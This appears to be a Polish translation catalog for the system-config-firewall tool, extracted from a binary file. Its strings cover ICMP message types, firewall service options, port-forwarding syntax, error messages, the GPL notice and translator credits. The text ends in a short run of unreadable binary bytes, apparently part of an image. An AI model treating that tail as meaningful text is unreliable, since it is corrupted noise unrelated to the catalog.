Należy zastosować konfigurację zapory sieciowej, aby rozwiązać ten problem.Typ protokołu "%s" jest nieprawidłowy.Nie zastosowano zmian, na pewno zakończyć?Ten komunikat błędu informuje komputer o wysłaniu pakietów na innej trasie.Ten komunikat błędu został utworzony przez komputer lub bramę, jeśli cel nie jest osiągalny.Ten komunikat błędu jest tworzony, jeśli nagłówek IP jest błędny, przez brak opcji lub błędną długość.Ten komunikat błędu jest tworzony, jeśli czas życia został przekroczony przez pakiet lub ponowne łączenie fragmentów pakietu.Ten komunikat błędu jest tworzony, aby nakazać komputerowi zmniejszenie tempa wysyłania pakietów.Ten komunikat jest odpowiedzią na <i>żądanie echa</i>.Ten komunikat jest używany przez komputer podłączony do łącza multikastowego, aby żądać <i>ogłaszania routera</i>Ten komunikat jest używany przez routery do okresowego ogłaszania adresu IP interfejsu multikastowego.Ten komunikat jest używany do sprawdzenia, czy komputer jest osiągalny, zwykle za pomocą narzędzia <i>ping</i>.Ta opcja umożliwia serwerowi Bacula połączenie się z lokalnym komputerem, aby wykonać zaplanowane kopie zapasowe. Aby skorzystać z tej opcji, musi być zainstalowany pakiet bacula-client.Ta opcja pozwala na przyjmowanie poczty elektronicznej za pomocą SMTP. Jeśli zdalne komputery mają mieć możliwość łączenia się bezpośrednio z tym komputerem, aby pobierać pocztę, należy ją włączyć. Jeśli użytkownik korzysta ze skrzynki pocztowej u swojego ISP przez IMAP lub POP3, albo używane są narzędzia takie jak fetchmail, włączenie tej opcji nie jest wymagane. Proszę zwrócić uwagę, że nieprawidłowo skonfigurowany serwer SMTP może pozwalać na wysyłanie przez komputer niechcianych wiadomości.Ta opcja pozwala na dostęp do serwerów trywialnego protokołu przesyłania plików (TFTP). Aby skorzystać z tej opcji, musi być zainstalowany pakiet tftp.Ta opcja pozwala na dostęp i współdzielenie drukarek i plików w sieciach Windows. Aby skorzystać z tej opcji, musi być zainstalowany pakiet samba-client.Ta opcja pozwala na dostęp i współdzielenie drukarek i plików w sieciach Windows. Aby skorzystać z tej usługi, musi być zainstalowany pakiet samba.Ta opcja umożliwia używanie Red Hat Cluster Suite. Porty zostaną otwarte dla usług openais, ricci i dlm. Aby skorzystać z tej opcji, wymagany jest Red Hat Cluster Suite.Niniejszy program jest wolnym oprogramowaniem; można go rozprowadzać dalej i/lub modyfikować na warunkach Powszechnej Licencji Publicznej GNU, wydanej przez Fundację Wolnego Oprogramowania (Free Software Foundation) - według wersji drugiej tej Licencji lub którejś z późniejszych wersji.

Niniejszy program rozpowszechniany jest z nadzieją, iż będzie on użyteczny - jednak BEZ JAKIEJKOLWIEK GWARANCJI, nawet domyślnej gwarancji PRZYDATNOŚCI HANDLOWEJ albo PRZYDATNOŚCI DO OKREŚLONYCH ZASTOSOWAŃ. W celu uzyskania bliższych informacji należy zapoznać się z Powszechną Licencją Publiczną GNU.

Z pewnością wraz z niniejszym programem dostarczono także egzemplarz Powszechnej Licencji Publicznej GNU (GNU General Public License); jeśli nie - proszę odwiedzić stronę internetową <http://www.gnu.org/licenses/>.Ten program pomoże ustawić podstawową zaporę sieciową dla systemu.Ten kreator pomoże ustawić czystą konfigurację zapory sieciowej dla systemu.Przekroczono czasDo adresuDo portuAby uzyskać czysty stan, moduły zapory sieciowej jądra muszą zostać wyładowane podczas ponownego uruchomienia lub zatrzymania zapory.Zaufane interfejsyZaufane usługiTypWyładowanie modułów podczas ponownego uruchamiania i zatrzymaniaZaktualizowanie zapory sieciowej nieinteraktywnie, jeśli jest włączona. Spowoduje to ponowne uruchomienie zapory. Opcje -n oraz -f zostaną zignorowane.Można użyć własnych plików reguł, aby dodać dodatkowe reguły do zapory sieciowej. Reguły zostaną dodane po domyślnych regułach. Pliki muszą być w formacie iptables-save.Określone przez użytkownikaPoziom umiejętności użytkownikaUżycie tych opcji bez dodatkowych opcji zapory sieciowej nie utworzy ani nie zmieni konfiguracji zapory, tylko skonfiguruje SELinuksa.Prawidłowe wartości: %sPrawidłowe wartości: <port>[-<port>], gdzie port jest liczbą [0..65535] lub nazwą usługi.Prawidłowe wartości: tcp, udpWięcej informacji o stanieZarządzanie maszynami wirtualnymiZarządzanie maszynami wirtualnymi (TLS)WWW (HTTP)OstrzeżenieJakiego rodzaju to system?KreatorTakMożna potem zmienić ustawienia w menu <i>Opcje</i>.Konfiguracja zapory sieciowej została przekonwertowana z poprzedniej wersji. Proszę sprawdzić konfigurację i ją zastosować.[<typ>:][<tablica>:]<nazwa_pliku>_O programie_PlikPomo_c_OpcjeZa_kończ_Uruchom kreatora konfiguracjikonfiguracjaif=<interfejs>:port=<port>:proto=<protokół>[:toport=<port docelowy>][:toaddr=<adres docelowy>]nieprawidłowy interfejs "%s".nieprawidłowe określenie portu %s.nieprawidłowa usługa "%s".IPv6 nie obsługuje NAT.lokalnemDNS dostarcza możliwość używania interfejsów programistycznych DNS, formatów pakietów i operowania semantycznego w małych sieciach bez zwykłego serwera DNS. Jeśli planowane jest używanie programu Avahi, nie należy wyłączać tej opcji.zmodyfikowana etykietanie ma takiej opcji: %sopcja %(option)s: nieprawidłowe forward_port "%(value)s".opcja %(option)s: nieprawidłowe forward_port "%(value)s": %(error)s.opcja %(option)s: nieprawidłowy typ ICMP "%(value)s".zakres portów %s nie jest unikalny.system-config-firewallTom Berner <tom@lodz.pl>, 2004
Andrzej Olszewski <andrzej.olszewski@ifj.edu.pl>, 2004
Piotr Drąg <piotrdrag@gmail.com>, 2007
Tomasz Chrzczonowicz <chrzczonowicz@gmail.com>, 2009Konfiguracja zapory sieciowejMożna zaznaczyć typy ICMP na liście, które powinny być odrzucane. Wszystkie inne typy ICMP będą mogły przechodzić przez zaporę sieciową. Domyślnie nie ma ograniczeń.Internetowy protokół kontroli komunikatów (ICMP) jest używany głównie do wysyłania komunikatów błędów między komputerami sieciowymi, ale także dodatkowo do komunikatów informacyjnych, takich jak żądania i odpowiedzi ping.Można użyć własnych plików reguł, aby dodać dodatkowe reguły do zapory sieciowej. Reguły zostaną dodane po domyślnych regułach. Pliki muszą być w formacie iptables-save.
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`